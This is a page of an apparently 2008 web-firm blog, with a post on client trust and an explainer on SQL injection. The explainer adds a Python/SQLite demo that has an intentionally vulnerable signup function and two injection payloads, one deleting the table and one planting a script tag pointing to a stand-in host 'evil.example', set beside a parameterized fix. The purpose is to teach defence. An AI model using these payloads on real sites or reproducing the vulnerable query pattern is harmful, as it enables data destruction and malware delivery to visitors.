Showing posts with label security. Show all posts

Tuesday, September 2, 2008

trust and the internet business relationship

Dear client, prospect, vendor, partner, team-member, or casual web surfer:

At CDLLC, we constantly strive to keep everyone in the family satisfied, and in the process, each client places a lot of trust in CDLLC, for which we are very grateful.

We also understand that it can be quite nerve-wracking to be that new client, putting your trust in us to take care of you and your business. And we appreciate the pain of the adjustment process you (new customer) have been brave enough to undertake.

During this adjustment, communication struggles and trust issues inevitably pop up. "Did I get short-changed?" "Have I received what I paid for?" This is perfectly understandable, as the same thing occurs with any new partnership involving the purchase of extremely complex systems, where there is conceivably lots of room for "smoke-and-mirrors" type price gouging.

This 'internet anxiety' can reach a point where you (new client) might even begin to doubt the honesty and ethics of CDLLC. We COMPLETELY understand this, and have in fact been in the same position ourselves, with our first vendors way back when the commercial internet took off about a decade ago.

Why is this so anxiety provoking?

Well, one explanation is because the INTERNET, e-commerce, e-transactions, this whole hyper-speed information revolution: it's a new frontier: WEIRD NEW STUFF!

In the words of a wise associate, "it's still the wild west out there."

Even the powerhouses of cyberspace stumble at times with the loosey-goosey, constantly hyper-speed-evolving nature of business on the internet.

Below are a handful of examples, offered in the hope of reassuring you (precious new customer) that we play by the same rules as the Microsofts, Amazons, and Yahoos of the internet...

  1. http://valleywag.com/5037267/netflix-crash-caused-by-botched-oracle-upgrade: systems crash, and rollback procedures are not always simple. Ask Netflix.
  2. http://www.out-law.com/page-4049: things expire, and the show-no-weakness corporation gets a little egg on its face (oops! Microsoft lost their domain name ownership).
  3. http://news.cnet.com/Good-Samaritan-squashes-Hotmail-lapse/2100-1023_3-234907.html: oops, take 2: Microsoft lost their domain ownership again.
  4. http://www.sslshopper.com/article-ssl-certificate-renewal-even-google-forgets.html: oops, take 3: Google's secure certificate expired!

The take-away from this mini-dissertation is as follows:

Business will always be business: people trading with people. The medium through which transactions occur may change (pony express, telegraph, telephone, email, web forms, instant e-stock trades), and this is always unfamiliar and intimidating.

However, these new transaction media all have one thing in common: they are engineered, created, and used by people. And with these people, the same rules of business still apply.

At the end of the day, it's all about the age-old mutually-beneficial trust relationship between two parties, perhaps corporate entities. Let us not forget: those big corporations are owned by people, too, just like you and me.


A special thank you to all of our clients who entrust us to protect their business in the wild west of the internet.

Thursday, May 22, 2008

What's SQL Injection? Some new drug or something?

In a nutshell, "SQL injection" is a way to hack into a website, break it, or otherwise make a big mess of it, by tricking the site's database into running commands the attacker chose. SQL is the language used to talk to databases; it uses statements like SELECT, INSERT, DELETE, and UPDATE.

Think of SQL injection as analogous to Microsoft's buffer overflow problems (you know those Windows updates that you get at 3AM every morning? A lot of 'em fix Microsoft's failure to properly handle buffer overflows, where a program is handed more input than it set aside room for and the excess lands somewhere it shouldn't).

Both buffer overflows and SQL injection happen for the same underlying reason: something a user typed (into a URL in the address bar, a form field, a cookie) is supposed to be treated as plain data, but the server handles it carelessly enough that part of it gets treated as instructions and actually runs.

For example, http://crockettdunn.blogspot.com/?andDeleteAllOfCrockettsBlog

Obviously it's not that simple, but that's the idea.

"But Crockett," you ask, "why do I care about SQL injection?"

See below, quoted from the article (link: http://msdn.microsoft.com/en-us/library/ms998271.aspx):

SQL injection attacks on the rise

During the past few months, SQL injection attacks have been used to break into hundreds of thousands of Web sites powered by Microsoft's Internet Information Server (IIS) and SQL Server. The attacks pass unauthorized SQL queries to backend database servers, where they perform any number of actions, such as deleting entire databases or tables and modifying various types of stored data, including text and HTML.

Microsoft, SANS, Shadow Server, Trend Micro, F-Secure, and numerous other organizations have written about the ongoing problem, which has been occurring since at least last March. In a nutshell, the bad guys are exploiting flaws in ASP.NET applications to inject unwanted HTML code into database records. That HTML eventually winds up in Web pages. When you browse to the page, the HTML code tries to exploit security vulnerabilities in browsers and related tools to install a variety of malware onto your PC.

These attacks are possible because of security bugs in various ASP.NET-based applications. Apparently, many developers have overlooked the need to properly sanitize input supplied by Web users.

For example, a Web form might ask people to enter their name and e-mail address to sign up for a newsletter. Along with that information, a hacker could add some special characters and a valid SQL query statement. If that input isn't properly sanitized before it's sent to the SQL server, the server might be tricked into executing the query supplied by the bad guy.

The solution is to audit your Web applications to make sure they sanitize user-supplied input. Microsoft's article entitled "How To: Protect From SQL Injection in ASP.NET" explains the required steps.
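Here is the newsletter sign-up form from the quoted article, and the "input gets run as instructions" idea from the explanation above it, as an added worked example (this is not code from the original post or from Microsoft; it is written in Python against an in-memory SQLite database rather than ASP.NET and SQL Server, because it runs anywhere with no setup). The subscribers table, the names, and the two payloads are constructed for the demo. One version of the sign-up pastes the visitor's input into the SQL text; the other passes it as a parameter. The first payload deletes the table's contents, the second does what the 2008 mass attacks did and appends a script tag to every stored name.

```python
import sqlite3

# Constructed sample schema and data for this demo (not from the original post).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscribers (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.execute("INSERT INTO subscribers (name, email) VALUES ('Alice', 'alice@example.com')")
    conn.commit()
    return conn

def vulnerable_signup(conn, name, email):
    """The bug: the visitor's input is pasted straight into the SQL text.
    A single quote in the input ends the string literal, so everything after
    it is parsed as SQL (instructions), not as the e-mail address (data)."""
    sql = f"INSERT INTO subscribers (name, email) VALUES ('{name}', '{email}')"
    # sqlite3's execute() refuses a string holding more than one statement, so
    # executescript() is used here to model a driver (such as SQL Server's
    # ADO.NET client) that happily runs a whole batch in one call.
    conn.executescript(sql)

def safe_signup(conn, name, email):
    """The fix: a parameterized query. The statement text is fixed and the
    values travel separately, so quotes and semicolons in the input are
    stored exactly as typed and are never executed."""
    conn.execute("INSERT INTO subscribers (name, email) VALUES (?, ?)", (name, email))
    conn.commit()

def rows(conn):
    return [tuple(r) for r in conn.execute("SELECT name, email FROM subscribers ORDER BY id")]

# Two constructed payloads of the kind the quoted article describes. Each one
# closes the open string and the VALUES list, adds a statement of its own, and
# comments out the rest of the original query with "--".
DELETE_PAYLOAD = "m@example.com'); DELETE FROM subscribers; --"
HTML_PAYLOAD = ("m@example.com'); UPDATE subscribers SET name = name || "
                "'<script src=\"http://evil.example/x.js\"></script>'; --")

def run_vulnerable(payload):
    """Sign up 'Mallory' through the buggy form and return what is left."""
    conn = make_db()
    vulnerable_signup(conn, "Mallory", payload)
    return rows(conn)

def run_safe(payload):
    """Same sign-up through the parameterized form."""
    conn = make_db()
    safe_signup(conn, "Mallory", payload)
    return rows(conn)

if __name__ == "__main__":
    print("vulnerable + DELETE payload:", run_vulnerable(DELETE_PAYLOAD))
    print("vulnerable + HTML payload:  ", run_vulnerable(HTML_PAYLOAD))
    print("parameterized + payload:    ", run_safe(DELETE_PAYLOAD))
```

Run it and compare the three lines: the buggy form loses every subscriber to the first payload and serves a script tag to every future reader of the page with the second, while the parameterized form stores the whole payload as a harmless, oddly spelled e-mail address. Two points for practitioners: parameterized queries (SqlParameter in ASP.NET) are the primary fix, with input validation as a second layer rather than a substitute, since "sanitizing" by stripping or escaping characters is easy to get subtly wrong; and the database account the web application connects with should hold only the rights it needs, so that even a successful injection cannot DELETE whole tables or call administrative stored procedures.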